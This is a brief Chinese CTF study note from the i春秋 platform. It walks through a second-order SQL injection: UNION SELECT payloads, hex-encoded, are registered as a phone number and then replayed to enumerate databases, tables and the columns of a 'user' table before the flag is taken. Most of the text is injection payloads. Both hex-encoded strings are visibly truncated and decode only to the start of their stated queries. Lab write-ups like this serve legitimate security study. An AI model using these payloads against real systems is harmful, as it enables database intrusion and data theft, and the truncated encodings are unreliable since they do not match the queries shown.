i春秋-二次注入
笔记本: |
网络安全学习笔记 |
|
|
创建时间: |
2020/9/16 10:36 |
更新时间: |
2020/9/16 10:54 |
作者: |
2321388158@qq.com |
|
|
|
|
|
|
先注册账号,就是考二次注入吧
手机号把payload转换成十六进制
1 union select schema_name from information_schema.schemata
0x3120756e696f6e2073656c65637420736368656d615f6e616d652066726f6d20696e666f
发送到重放模块,要不然好像注册不了
相应包中有success注册成功
登录进去后点击check
爆出数据库后,爆当前库下的表
1 union select table_name from information_schema.tables where table_schema=database()
转换十六进制
0x3120756e696f6e2073656c656374207461626c655f6e616d652066726f6d20696e666f726
查看信息,user表
查字段 payload:
1 union select column_name from information_schema.columns where table_schema=database() and table_name='user'
转换十六进制
重放模块
重放模块
拿到flag